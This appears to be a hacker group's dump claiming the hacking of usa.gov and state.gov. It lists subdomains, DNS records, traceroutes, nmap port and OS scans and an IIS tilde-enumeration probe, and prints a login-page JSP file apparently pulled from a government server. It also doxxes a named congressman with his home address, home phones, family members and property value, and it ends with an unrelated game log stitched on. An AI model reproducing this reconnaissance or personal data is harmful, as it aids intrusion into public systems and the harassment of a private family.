#Hacked #UGNazi www.usa.gov www.state.gov

1. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
2. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
3.  
4. ****XXXXXXXX***
5. ***XXXXXXXXXX########XX*
6. ****XXXXXXXX################XX**
7. *XXXXXXXXXX#######################X**
8. **XXXXXXXXX##############################X*
9. **XXXXXXX#######X##XXXX######################X*
10. *X*****XXXXXXXXXXXXXXXXX##########################X*
11. *X##XX*****XXXXXXXXXX#################################*
12. XX#X##X#XX** *****XXXXX########################*
13. X#######XXX** ***XXXX##################*
14. *########XXX* ****XX################
15. X####X##XXX* **XX#############X
16. X####XXXX** **X###########X
17. X###XXXX* *X######X#X#*
18. X#XXXXXX WOLLT IHR DEN *XX#X***X#X
19. X######X* *******X#
20. *######X* **X#
21. *X##X#X* ****************XX
22. X##XX* ***********XXXXXXXXXXXXXX****X
23. *XXX* **XXXXXXXXXXX***XX########XXXXXXXXX**X
24. *XX* ******XXXX#########X****X#####XXXX####XXXX***
25. **** **X***X#X*XXX#######X* X###XXX***XXXXXXX******
26. ***X#XX** ****XXXXX* *XXXXXX*****X**XX****XX
27. XX** *X* ***XX**X** ***XXX*XXX**********X*
28. *XXX** ********** **************** ****
29. *XX* ** ********* ********************
30. *****X* ** ***** *********
31. ** *X* **** *********
32. * * ******************
33. * * **X* *******XXXXXXXX***********
34. * ****X***X############X*************
35. * ****** X##############X************
36. *** X##############X***********
37. XXX###########XX***********
38. **XXX##XXX####XXXXXX********
39. **XXXX*******X**XXXXXXXX******
40. *XX**** **XXXXXXXXX**********
41. ***** * ****XXXXXXXXXXXXXX*******
42. *************XX**XX***********XXXX#*
43. ******* ****XXXXX##X*
44. ******** *****XXXXX#####XXX*
45. ***XX***** ******XXXXXX#########XXX*
46. *****XXXX***XXXXXXXXXXXXX##############XXXX*
47. ****XXXXXXX############################XXXX**
48. * ***XXXXXX#X###########################XXXXXXX
49. * ***XXXX###############################XXXXXXX
50. * **XXX##################################XXXXX
51.  
52. Twitter: @OsamaTheGod
53. Target : www.usa.gov
54. Target : www.state.gov
55. #UGNazi
56.  
57. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
58. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
59.  
60. search.usa.gov
61. usa.gov
62. blog.usa.gov
63. publications.usa.gov
64. business.usa.gov
65. answers.usa.gov
66. kids.usa.gov
67. go.usa.gov
68. apps.usa.gov
69. promotions.usa.gov
70.  
71. dns3.gsa.gov
72. dns4.gsa.gov
73. dns5.gsa.gov
74. dns2.gsa.gov
75. dns.gsa.gov
76. dns6.gsa.gov
77.  
78. usa.gov A 1 hour 173.252.148.104 ()
79. usa.gov A 1 hour 216.128.241.47 (Addison, TX, US)
80. usa.gov SOA 5 minutes dns.gsa.gov. hostmaster.gsa.gov. 1211280010 86400 600 1296000 10800
81. usa.gov NS 5 minutes dns3.gsa.gov
82. usa.gov NS 5 minutes dns4.gsa.gov
83. usa.gov NS 5 minutes dns5.gsa.gov
84. usa.gov NS 5 minutes dns2.gsa.gov
85. usa.gov NS 5 minutes dns.gsa.gov
86. usa.gov NS 5 minutes dns6.gsa.gov
87. blog.usa.gov CNAME 1 hour domains.tumblr.com
88. www.usa.gov CNAME 10 minutes www.usa.gov.edgesuite.net
89.  
90. #Serial Number 1211280010
91.  
92. IP: 12.129.120.24
93. Continent: North America (NA)
94. Country: United States (US)
95. Capital: Washington
96. State: California
97. City: San Diego
98. Postal: 92121
99. Area: 858
100. ISP: AT&T Services
101. Organization: CERFnet
102. Time zone: America/Boise
103.  
104. IP: 72.247.242.75
105. Continent: North America (NA)
106. Country: United States (US)
107. Capital: Washington
108. State: Massachusetts
109. City: Cambridge
110. Postal: 02142
111. Area: 617
112. ISP: Akamai Technologies
113. Organization: Akamai Technologies
114. Time zone: America/New_York
115.  
116. IP: 173.252.148.104
117. Continent: North America (NA)
118. Country: United States (US)
119. Capital: Washington
120. State: New Jersey
121. City: Basking Ridge
122. Postal: 07920
123. Area: 908
124. ISP: Sungard Network Solutions
125. Organization: CGI Technologies and Solutions
126. Time zone: America/New_York
127.  
128. traceroute to usa.gov (173.252.148.104), 20 hops max, 40 byte packets
129. 1 174.36.196.241-static.reverse.softlayer.com (174.36.196.241) 0.269 ms 0.271 ms 0.299 ms
130. 2 ae11.dar01.sr01.wdc01.networklayer.com (208.43.118.133) 2.497 ms 2.496 ms 2.474 ms
131. 3 ae8.bbr02.eq01.wdc02.networklayer.com (173.192.18.192) 0.484 ms ae8.bbr01.eq01.wdc02.networklayer.com (173.192.18.196) 0.481 ms ae8.bbr02.eq01.wdc02.networklayer.com (173.192.18.192) 0.480 ms
132. 4 xe-10-1-1.edge3.Washington4.Level3.net (4.53.116.65) 0.907 ms xe-8-2-0.edge1.washington4.level3.net (4.53.112.25) 0.889 ms 0.862 ms
133. 5 vlan90.csw4.washington1.level3.net (4.69.149.254) 1.715 ms vlan80.csw3.washington1.level3.net (4.69.149.190) 12.347 ms vlan60.csw1.washington1.level3.net (4.69.149.62) 13.966 ms
134. 6 ae-72-72.ebr2.washington1.level3.net (4.69.134.149) 1.728 ms ae-62-62.ebr2.washington1.level3.net (4.69.134.145) 1.017 ms ae-72-72.ebr2.washington1.level3.net (4.69.134.149) 1.354 ms
135. 7 ae-7-7.bar1.philadelphia1.level3.net (4.69.133.161) 14.770 ms 14.778 ms 14.760 ms
136. 8 ae-3-3.car1.Philadelphia1.Level3.net (4.69.153.94) 7.536 ms 7.135 ms 7.391 ms
137. 9 SUNGARD-NET.car1.Philadelphia1.Level3.net (4.78.152.186) 6.324 ms 6.297 ms 6.633 ms
138. 10 216.203.56.194 (216.203.56.194) 6.916 ms 7.292 ms 7.307 ms
139. 11 173.252.132.148 (173.252.132.148) 7.982 ms 7.600 ms 7.691 ms
140.  
141. Scanning www.answers.usa.gov (12.129.120.24) [1000 ports]
142. Discovered open port 80/tcp on 12.129.120.24
143. Discovered open port 21/tcp on 12.129.120.24
144.  
145. Initiating OS detection (try #1) against www.answers.usa.gov (12.129.120.24)
146. OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7:::enterprise
147. OS details: Microsoft Windows Server 2008 SP1, Microsoft Windows 7 Enterprise
148.  
149. TRACEROUTE (using port 80/tcp)
150. HOP RTT ADDRESS
151. 1 0.08 ms 192.168.26.2
152. 2 0.08 ms 12.129.120.24
153.  
154. ceac.state.gov
155. travel.state.gov
156. dvlottery.state.gov
157. state.gov
158. evisaforms.state.gov
159. pptform.state.gov
160. photos.state.gov
161. identix.state.gov
162. search.state.gov
163. passportstatus.state.gov
164. careers.state.gov
165. step.state.gov
166. exchanges.state.gov
167. history.state.gov
168. j1visa.state.gov
169. adoption.state.gov
170. aoprals.state.gov
171. connect.state.gov
172. eca.state.gov
173. blogs.state.gov
174. americanenglish.state.gov
175. pmddtc.state.gov
176. educationusa.state.gov
177. infocentral.state.gov
178. alumni.state.gov
179. fpc.state.gov
180. usun.state.gov
181. contact-us.state.gov
182. iew.state.gov
183. mepi.state.gov
184. conx.state.gov
185. ofmapps.state.gov
186. fulbright.state.gov
187. video.state.gov
188. infousa.state.gov
189.  
190. IP: 72.247.242.35
191. Continent: North America (NA)
192. Country: United States (US)
193. Capital: Washington
194. State: Massachusetts
195. City: Cambridge
196. Postal: 02142
197. Area: 617
198. ISP: Akamai Technologies
199. Organization: Akamai Technologies
200. Time zone: America/New_York
201.  
202. state.gov A 3 hours 72.166.186.151 (Alexandria, VA, US)
203. state.gov MX 25 minutes 20 stimson.state.gov
204. state.gov MX 25 minutes 20 haig-ee.state.gov
205. state.gov NS 3 hours state02.ultradns.net
206. state.gov NS 3 hours ns1.terrenap.net
207. state.gov NS 3 hours state01.ultradns.net
208. state.gov NS 3 hours ns2.terrenap.net
209. haig-ee.state.gov A 3 hours 169.253.194.10 (Washington, DC, US)
210. stimson.state.gov A 3 hours 169.252.4.131 (Washington, DC, US)
211. state.gov SOA 3 hours dnsmaster.state.gov. hostmaster.state.gov. 316 10807 900 1296000 6000
212. state.gov SOA 1 hour 40 minutes dnsmaster.state.gov. hostmaster.state.gov. 316 10807 900 1296000 6000
213. forum.state.gov CNAME 3 hours redir.state.gov
214. redir.state.gov A 3 hours 72.166.186.160 (Alexandria, VA, US)
215. www.state.gov CNAME 3 hours ipv6worldday.state.gov.edgesuite.net
216.  
217. traceroute to state.gov (72.166.186.151), 20 hops max, 40 byte packets
218. 1 174.36.196.241-static.reverse.softlayer.com (174.36.196.241) 0.258 ms 0.280 ms 0.308 ms
219. 2 ae11.dar02.sr01.wdc01.networklayer.com (208.43.118.137) 0.173 ms 0.179 ms 0.164 ms
220. 3 ae9.bbr02.eq01.wdc02.networklayer.com (173.192.18.188) 0.866 ms 44.730 ms 44.697 ms
221. 4 xe-8-2-0.edge1.washington4.level3.net (4.53.112.25) 1.215 ms 1.208 ms 1.208 ms
222. 5 vlan80.csw3.washington1.level3.net (4.69.149.190) 4.307 ms 4.302 ms vlan90.csw4.washington1.level3.net (4.69.149.254) 1.717 ms
223. 6 ae-72-72.ebr2.washington1.level3.net (4.69.134.149) 1.723 ms ae-62-62.ebr2.washington1.level3.net (4.69.134.145) 1.379 ms ae-92-92.ebr2.washington1.level3.net (4.69.134.157) 1.700 ms
224. 7 ae-3-3.ebr1.newyork2.level3.net (4.69.132.90) 6.441 ms 14.307 ms 6.197 ms
225. 8 ae-1-51.edge3.newyork2.level3.net (4.69.138.196) 6.623 ms 6.276 ms 6.369 ms
226. 9 jfk-brdr-04.inet.qwest.net (63.146.26.5) 6.340 ms 6.335 ms 6.645 ms
227. 10 stn-cntr-01.inet.qwest.net (205.171.251.42) 10.203 ms 9.947 ms 9.760 ms
228. 11 (66.77.12.244) 9.504 ms 8.159 ms 9.247 ms
229.  
230. rDNS record for 92.122.210.170: a92-122-210-170.deploy.akamaitechnologies.com
231. PORT STATE SERVICE VERSION
232. 21/tcp open ftp?
233. |_ftp-bounce: no banner
234. 53/tcp closed domain
235. 80/tcp open http AkamaiGHost (Akamai's HTTP Acceleration/Mirror service)
236. |_http-methods: No Allow or Public header in OPTIONS response (status code 501)
237. | http-robots.txt: 1554 disallowed entries (15 shown)
238. | /www/ /waterfall/ /menu/ /navitest/
239. | /documents/cat_desc/ /documents/backup/ organization/revisions
240. | organization/193543.pdf organization/193546.pdf organization/193567.pdf
241. | organization/120733.pdf organization/120738.pdf organization/124827.pdf
242. |_organization/124828.pdf organization/124829.pdf
243. |_http-title: U.S. Department of State
244. |_http-favicon: Unknown favicon MD5: 0713DD3D30C35F2474EFAA320D51F3C9
245. 443/tcp open ssl/http AkamaiGHost (Akamai's HTTP Acceleration/Mirror service)
246. |_sslv2: server still supports SSLv2
247. |_http-methods: No Allow or Public header in OPTIONS response (status code 501)
248. | http-robots.txt: 1554 disallowed entries (15 shown)
249. | /www/ /waterfall/ /menu/ /navitest/
250. | /documents/cat_desc/ /documents/backup/ organization/revisions
251. | organization/193543.pdf organization/193546.pdf organization/193567.pdf
252. | organization/120733.pdf organization/120738.pdf organization/124827.pdf
253. |_organization/124828.pdf organization/124829.pdf
254. |_http-title: U.S. Department of State
255. |_http-favicon: Unknown favicon MD5: 0713DD3D30C35F2474EFAA320D51F3C9
256. | ssl-cert: Subject: commonName=a248.e.akamai.net/organizationName=Akamai Technologies, Inc./countryName=US
257. | Issuer: commonName=GTE CyberTrust Global Root/organizationName=GTE Corporation/countryName=US
258. | Public Key type: rsa
259. | Public Key bits: 1024
260. | Not valid before: 2012-08-27 18:54:14
261. | Not valid after: 2013-08-27 18:53:22
262. | MD5: 0195 040f 2287 236c f5ad 9ef7 2982 1cb9
263. |_SHA-1: 97e8 2560 e3e8 b2db 741e 38f1 f798 a89d d676 cec0
264. 8000/tcp closed http-alt
265. Device type: general purpose|storage-misc|VoIP phone
266. Running (JUST GUESSING): Microsoft Windows 2008|7 (97%), BlueArc embedded (91%), Pirelli embedded (87%)
267. OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7:::enterprise
268. Aggressive OS guesses: Microsoft Windows Server 2008 SP1 (97%), Microsoft Windows 7 Enterprise (96%), BlueArc Titan 2100 NAS device (91%), Pirelli DP-10 VoIP phone (87%)
269.  
270.  
271. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
272. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
273.  
274. Name: Charles Wieder Dent
275. Birthdate: May 24, 1960
276. Age: 51
277. Religion: Presbyterian
278. Party Affiliation: Republican
279. High School: William Allen High School, Allentown, PA (1978)
280. University: BA International Politics, Pennsylvania State University (1982)
281. University: MPA, Lehigh University (1993)
282.  
283. Wife: Pamela Jane Serfass Dent
284. Age: 46
285.  
286. Father: Walter R. Dent
287. Mother: Marjorie Dent
288. Brother: Peter Dent
289. Children: Kathryn Elizabeth Dent, William Reed Dent, Charles John Dent
290.  
291. Address:
292. 3626 Evening Star Terrace, Allentown, PA 18104-4546
293. Phone Numbers: (610) 481-3327, (610) 481-0027
294. Property Value: $304,156 [http://bit.ly/ySb11P]
295.  
296. Washington, D.C. Office:
297. 1009 Longworth House Office Building,
298. District of Columbia 20515-3815
299. Phone: (202) 225-6411
300. Fax: (202) 226-0778
301.  
302. Allentown Office:
303. 3900 Hamilton Boulevard, Suite 207
304. Allentown, Pennsylvania 18103
305. Phone: (610) 770-3490
306.  
307. East Greenville Office:
308. 206 Main Street
309. East Greenville, Pennsylvania 18041
310. Phone: (215) 541-4106
311. Fax: (215) 541-4109
312.  
313. Other Contact Info:
314. Website: www.dent.house.gov | www.gsa.gov
315. Facebook: www.facebook.com/CongressmanDent
316. Twitter: www.twitter.com/DentPressShop
317. YouTube: www.facebook.com/CongressmanDent
318. Campaign Site: www.dentforcongress.com/
319. Miscellaneous: www.peekyou.com/charles_dent/272350642
320.  
321. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
322. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
323.  
324. & cat ROOT.jsp
325.  
326. <%@ page import="com.egain.platform.common.*" %>
327. <%@ page import="com.egain.platform.common.exception.*" %>
328. <%@ page import="com.egain.platform.client.businessclients.UserBC" %>
329.  
330. <%
331. //By default, assume that same HTTP session exists on server.
332. boolean isHttpSessionActive = true ;
333. try
334. {
335. isHttpSessionActive = UserBC.isHttpSessionActive(session.getId(),1) ;
336. }
337. catch(Exception e)
338. {
339. //Log
340. }
341.  
342. %>
343. <html>
344. <head>
345. <title> eGain Service </title>
346. <link rel=stylesheet type="text/css" href="../../../../css/platform/egain.global.css">
347. <link rel=stylesheet type="text/css" href="../../../../css/platform/egain.public.css">
348. <link rel=stylesheet type="text/css" href="../../../../css/platform/egain.private.css">
349. <script language="javascript" src="../../../../widget/platform/util/util.js"></script>
350. <script language="javascript" src="../../../../view/platform/common/supportedbrowser.js"></script>
351. <script language="javascript" src="../../../../view/platform/common/login/login.js"></script>
352. <script language="javascript" src="../../../../widget/platform/framework/urlparser.js"></script>
353. <script language="javascript" src="../../../../widget/platform/framework/framework.js"></script>
354. <script language="javascript" src="../../agent/uacutil.js"></script>
355. <script language="javascript" src="../../../../widget/platform/alert/alert.js"></script>
356. <script id="propertyCommonL10N" language="javascript"></script>
357. <script id="preLoginRoot" language="javascript"></script>
358. <script id="loginRoot" language="javascript"></script>
359. <script>
360. // this is hardcoded here
361. loadL10NFile("../../../../../l10n/en/us/pl/web/common/l10ncommon.properties", "propertyCommonL10N", "en", "us");
362. loadL10NFile("../../../../../l10n/en/us/pl/web/login/prelogin.properties", "preLoginRoot", "en", "us");
363. loadL10NFile("../../../../../l10n/en/us/pl/web/login/login.properties", "loginRoot", "en", "us");
364. </script>
365. </head>
366. <script>
367.  
368. var closeRootWindow = false;
369. var locale = "";
370. var handle = null;
371. var timerId = null;
372.  
373. var isShowMessageCalled = false;
374. var timeout;
375. var pageLoaded = false;
376. var appletStarted = false;
377. resetStatusMessage();
378.  
379. function resetStatusMessage()
380. {
381. if (!pageLoaded)
382. {
383. if(this.status.indexOf('started')!=-1)
384. appletStarted = true;
385. this.status='';
386. setTimeout("resetStatusMessage()",10);
387. }
388. }
389.  
390. function resetPageLoaded()
391. {
392. if(appletStarted)
393. pageLoaded=true;
394. else
395. setTimeout("resetPageLoaded()",1000);
396. }
397.  
398. function onLoad()
399. {
400. if(isShowMessageCalled == true)
401. {
402. //getJava();
403. document.title = L10N_WINDOW_TITLE;
404. var passWindowOpen = getCookieForUAC("passWindowOpen");
405. if(passWindowOpen != 'undefined')
406. {
407. if(passWindowOpen == 'true')
408. {
409. var w=window.open('','_password');
410. w.focus();
411. return;
412. }
413. }
414. if (CheckBrowser())
415. {
416. openMainWindow();
417. setTimeout('checkWindowExists()',1000);
418.  
419. msgTable.rows[0].style.display = "block";
420. if(closeRootWindow)
421. setTimeout(winload,1000);
422. }
423. else
424. {
425. msgTable.rows[1].style.display = "block";
426. }
427. }
428. else
429. timeout = window.setTimeout('onLoad()',50);
430. //waitAndCall('isShowMessageCalled == true',null,'onLoad');
431. setTimeout("resetPageLoaded()",1000);
432. }
433.  
434. function openMainWindow()
435. {
436. //If Same http session does not exists on the same server, then only show login page else
437. //show an error message indicating that session already exists from same browser
438.  
439. if(<%=isHttpSessionActive%> == false)
440. {
441. var d = new Date() ;
442. // Set the Main Window name as "eGainMainWindow_<TIMESTAMP>" so that
443. // Main Window name can be identified while opening child windows for a report.
444. // This enables closing all child windows when user logs out.
445. var name = "eGainMainWindow_"+d.getHours() + "" + d.getMinutes() + "" + d.getSeconds() + "" + d.getMilliseconds() ;
446. var title = L10N_WINDOW_TITLE;
447.  
448. var width = 497;
449. var height = 297;
450. var left = Math.ceil( (window.screen.width - 521) / 2 );
451. var topPx = Math.ceil( (window.screen.height - 282) / 2 ) - 21;
452.  
453. var urlParser = new URLParser();
454. urlParser.parse();
455. var partitionId = urlParser.getParameter("partitionId");
456. var userName = urlParser.getParameter("userName");
457. var password = urlParser.getParameter("password");
458. var isAspectUser= urlParser.getParameter("isAspectUser");
459. readCookie(partitionId);
460.  
461. var url = "../../../../view/platform/common/login/top.jsp"
462. url = url +"?"+"partitionId="+((partitionId == null || partitionId == "")?"1":partitionId) + "&userName=" + ((userName == null || userName == "undefined")?"NA":userName) + "&password="+((password == null || password == "undefined")?"NA":password)+ "&isAspectUser="+((isAspectUser == null || isAspectUser == "undefined")?"false":isAspectUser)+"&locale="+locale;
463. var feature = "fullscreen=0,toolbar=0,location=0,directories=0,status=0,menubar= 0,scrollbars=1,resizable=1,width="+width+",height="+height+",left="+left+",top="+topPx;
464.  
465. handle = createWindow(url, name, feature)
466. }
467. else
468. {
469. var sameSession = new Alert(L10N_USER_ALREADY_LOGGEDIN_WITH_SAME_HTTPSESSION,L10N_ALERT_OH_CAPTION,"warning",L10N_ALERT_OH_KEY);
470. if (sameSession.returnValue == "button1")
471. showHelp("../../../../../help/en/us/common/login.htm");
472.  
473. }
474. }
475.  
476. function checkWindowExists()
477. {
478. try
479. {
480. if(typeof handle != 'undefined' && handle != null && handle.closed != true && handle.document.readyState != "complete")
481. {
482. if(timerId != null)
483. window.clearInterval(timerId);
484. timerId = window.setInterval("checkWindowExists()", 100);
485. return timerId;
486. }
487. else
488. {
489. if(timerId != null)
490. window.clearInterval(timerId);
491.  
492. if(handle.closed != true && handle.document.readyState == "complete" && handle.location.toString().toLowerCase().indexOf("logout.jsp") != -1)
493. {
494. var width = 460;
495. var height = 220;
496.  
497. var urlParser = new URLParser();
498. urlParser.parse();
499. var partitionId = urlParser.getParameter("partitionId");
500. var userName = urlParser.getParameter("userName");
501. var password = urlParser.getParameter("password");
502. var isAspectUser= urlParser.getParameter("isAspectUser");
503.  
504.  
505. var url = "../../../../view/platform/common/login/top.jsp"
506. url = url +"?"+"partitionId="+((partitionId == null || partitionId == "")?"1":partitionId) + "&userName=" + ((userName == null || userName == "undefined")?"NA":userName) + "&password="+((password == null || password == "undefined")?"NA":password)+ "&isAspectUser="+((isAspectUser == null || isAspectUser == "undefined")?"false":isAspectUser);
507.  
508. handle.location.href = url;
509. handle.resizeTo(width, height);
510.  
511. var left = Math.ceil( (window.screen.width - 521) / 2 );
512. var topPx = Math.ceil( (window.screen.height - 282) / 2 ) - 21;
513.  
514. handle.moveTo(left, topPx);
515. }
516. }
517. }
518. catch(err) {}
519.  
520. return;
521. }
522.  
523. function readCookie(currentPartition)
524. {
525. var all_cookie = document.cookie;
526. var cookieArray = all_cookie.split(';');
527. for(var i=0; i<cookieArray.length; i++)
528. {
529. var the_cookie = unescape(cookieArray[i]);
530. var broken_cookie = the_cookie.split("=");
531. if(trim(broken_cookie[0]) == trim("platform_cookie" + currentPartition))
532. {
533. var cookieDataArray = broken_cookie[1].split(":");
534. if(cookieDataArray[0] == "pl_partitionId" && cookieDataArray[1] == currentPartition)
535. {
536. locale = cookieDataArray[5];//locale read from cookie
537. break;
538. }
539. }
540. }
541. }
542.  
543. //Fn. for checking browsers jre version dated:21/12/2005 by Swapnil and Gagan
544. function getJava()
545. {
546. if(chkVendor() == 0)
547. {
548. new Alert(LION_INSTALL_SUNJRE);
549. }
550. else if(chkVendor() == 1)
551. {
552. new Alert(L10N_INVALID_VERSION);
553. }
554. }
555.  
556. function chkVendor()
557. {
558. var chk_Exception=0;
559. var applet = document.myApplet;
560. try
561. {
562. var version=document.myApplet.getJavaVersion();
563. }
564. catch(err)
565. {
566. chk_Exception=1;
567. }
568.  
569. if(chk_Exception==1)
570. return 0;
571. else
572. {
573. var converted_Version=divide_string(version);
574. if(converted_Version<15004)
575. {
576. return 1;
577. }
578. return 2;
579. }
580. }
581.  
582. function divide_string(version)
583. {
584. var version = "" + version;
585. var split_version=version.split(".");
586. if(split_version[2] != "0")
587. {
588. var split_version1=split_version[2].split("_");
589. return(parseInt(split_version[0]+split_version[1]+split_version1[0]+split_version1[1]));
590. }
591. else
592. {
593. return(parseInt(split_version[0]+split_version[1]+split_version[2]+"00"));
594. }
595. }
596.  
597. function changePassword(url)
598. {
599. var width = 330;
600. var height = 160;
601. var left = Math.ceil(window.screen.width/4)+50;
602. var topPx = Math.ceil(window.screen.height/4)+40;
603. if(typeof passwordWin != "undefined" && !passwordWin.closed)
604. return;
605. var feature = "fullscreen=0,toolbar=0,location=0,directories=0,status=0,menubar= 0,scrollbars=0,resizable=1,width="+width+",height="+height+",left="+left+",top="+topPx;
606. passwordWin = createWindow(url, "_password", feature)
607. setCookieForUAC("passWindowOpen","true");
608. }
609.  
610. function CheckBrowser()
611. {
612. // EGS-9700. Replace with new check in supportedBrowser.js
613. return EGS_BROWSER_SUPPORT.isSupportedBrowser();
614. /*
615. if (typeof window.clientInformation != "object")
616. {
617. return false;
618. }
619. if (window.clientInformation.appName != "Microsoft Internet Explorer")
620. {
621. return false;
622. }
623. return true;
624. */
625. }
626.  
627. //called from applet
628.  
629. function showSuccessMessage(status)
630. {
631. if(status==1)
632. new Alert(L10N_JAVA_PARAMS_SET_SUCCESS,L10N_OK_STRING,0,L10N_OK_KEY);
633. else
634. new Alert(L10N_JAVA_PARAMS_SET_FAIL,L10N_OK_STRING,0,L10N_OK_KEY);
635. closeWin();
636. }
637.  
638. //called from applet, and recursively from this function.
639. function showMessage(msgStatus)
640. {
641. var retVal = "-1";//default value
642. if(typeof msgStatus != 'undefined' && msgStatus == 1)
643. {
644. window.clearTimeout(timeout);
645. var alertWin = new Alert(L10N_SET_JAVA_PARAMS_CONFIRMATION,L10N_COMMON_BUTTON_OK_CANCEL_HELP,2,L10N_COMMON_BUTTON_OK_CANCEL_HELP_AK);
646. if(alertWin.returnValue == 'button0')//OK button
647. retVal="1";
648. else if(alertWin.returnValue == 'button2')//help button
649. {
650. showHelp("../../../../../help/en/us/common/jvm.htm");
651. retVal = showMessage(1);
652. }
653. else//cancel, or explicit close of alert message.
654. {
655. setTimeout("closeWin()",10);
656. }
657. }
658. else
659. isShowMessageCalled = true;
660. return retVal;
661. }
662.  
663. function closeWin()
664. {
665. window.opener="x";
666. window.close();
667. }
668.  
669. var handle = null;
670.  
671. function showHelp(helpURL)
672. {
673. var width = 600;
674. var height = 480;
675. var left = Math.ceil( (window.screen.width - 580) / 2 );
676. var topPx = Math.ceil( (window.screen.height - 440) / 2 );
677.  
678. var features = "height="+height+",width="+width+"left="+left+", top="+topPx+" ,status=no,toolbar=no,menubar=no,location=no,directories=no,titlebar=no,resizable=yes,scrollbars=yes";
679.  
680. if((handle == null) || (typeof handle != 'undefined' && handle.closed == true))
681. {
682. var name="help";
683. if(getCache("helpURLName")==null)
684. {
685. var d= new Date();
686. name="help"+d.getHours() + "" + d.getMinutes() + "" + d.getSeconds() + "" + d.getMilliseconds() ;
687. setCache("helpURLName",name);
688. }
689. else
690. {
691. name=getCache("helpURLName");
692. }
693. handle = window.open(helpURL,name,features);
694. }
695. handle.focus();
696. }
697.  
698. if(closeRootWindow)
699. document.write('<'+'obj'+'ect ID="WB" WIDTH=0 HEIGHT=0 CLASS'+'ID="CLS'+'ID:8856F961-340A-11D0-A96B-00C04FD705A2"><'+'/obj'+'ect>')
700. </script>
701. <script LANGUAGE="JavaScript1.2">
702. <!--
703. function winload()
704. {
705. if(navigator.appName=="Microsoft Internet Explorer")
706. {
707. var BrowserVerStr = navigator.appVersion;
708. parts = BrowserVerStr.split(";");
709. var preBrowVer = parts[1]
710. var BVNum=parseFloat((preBrowVer.substring(5,preBrowVer.length)))
711. if (BVNum >= 5.5)
712. WB.ExecWB(45,2)
713. else
714. window.close()
715. }
716. }
717. /*called from applet. Proceed to login only when this is called.
718. One of the cases when this will NOT get called is when the needed version of JRE is not available on the client.
719. */
720. function dummyAppletStartedCallback()
721. {
722. showMessage(0);
723. }
724. registerOnLoad(onLoad);
725. //-->
726. </script>
727.  
728. <body class="eGain" style="background-color:#ffffff;">
729. <table id="msgTable" border="0" cellpadding="0" cellspacing="0" width="100%" height="100%">
730. <tr id="egainmsg" style="display:none">
731. <td class="eGain" width="100%" valign="middle" align="center" style="background-color:#ffffff;">
732. <img id=logo src="../../../../image/platform/misc/map_logo.gif">
733. <p><font color="#666666">
734. <script>
735. document.write(L10N_MESG_1);
736. </script>
737. </font></p>
738. </td>
739. </tr>
740. <tr id="egainiemsg" style="display:none">
741. <td id="egainmsg" style="display:none" width="100%" valign="middle" align="center">
742. <font size="5"><b>
743. <script>
744. document.write(L10N_NON_IE_BROWSER);
745. </script>
746. </b></font>
747. </td>
748. </tr>
749. </table>
750.  
751. <script>
752. var html='';
753.  
754. html += ' <OBJECT classid='+EGPL_CLASSID+' WIDTH=10% HEIGHT=10% codebase='+EGPL_CODEBASE+' mayscript>\n'
755. html += ' <param name="code" value="com.egain.platform.client.widget.plugin.common.DummyApplet">\n'
756. html += ' <param name="codebase" value="../../../../../lib/int/platform/" >\n'
757. html += ' <PARAM NAME="java_arguments" VALUE="'+EGPL_APPLET_JVM_ARGUMENTS +'">\n'
758. html += EGPL_APPLET_CLASSLOADER_CACHE_VALUE
759. html += ' <param name="cache_archive" value="egpl_uicommon_plugin.jar">\n'
760. html += ' <PARAM NAME="cache_version" VALUE="'+ EGPL_PRODUCT_PATCH_VERSION +'">\n'
761. html += ' <param name="mayscript" value="true">\n'
762. html += ' <param name="type" value="application/x-java-applet;'+EGPL_VERSION+'">\n'
763. html += ' <param name="scriptable" value="true">\n'
764. html += ' </OBJECT>\n';
765.  
766. document.write(html);
767. </script>
768.  
769. </body>
770. </html>
771.  
772. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
773. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
774. #Microsoft IIS tilde directory enumeration
775.  
776. www.answers.usa.gov/*~1*/config.aspx?aspxerrorpath=/ (404 forbidden)
777.  
778. GUNZ 1,0,0,290 launched. build (Sep 22 2012 00:28:39)
779. Log time (11/05/12 14:59:37)
780. Linear88's Runnable!
781. CPU ID = GenuineIntel ( family = 262 , model = 12 , stepping = 2 ) @ 1596 MHz
782. Display Device = Mobile Intel(R) 945 Express Chipset Family ( vendor=8086 device=27ae subsys=2f41028 revision=3 )
783. Display Driver Version = 6.14.0010.4926
784. Windows = 5.1 Build 2600 , Service Pack 3 (1038700KB) : Windows xp..
785. Load XML from memory : system/locale.xml- SUCCESS
786. Country : (USA), Language : (USA)
787. Load Config from file : config.xml- FAIL
788. Load XML from memory : system/system.xml- SUCCESS
789. Load XML from memory : system/strings.xml(0x0009) - SUCCESS
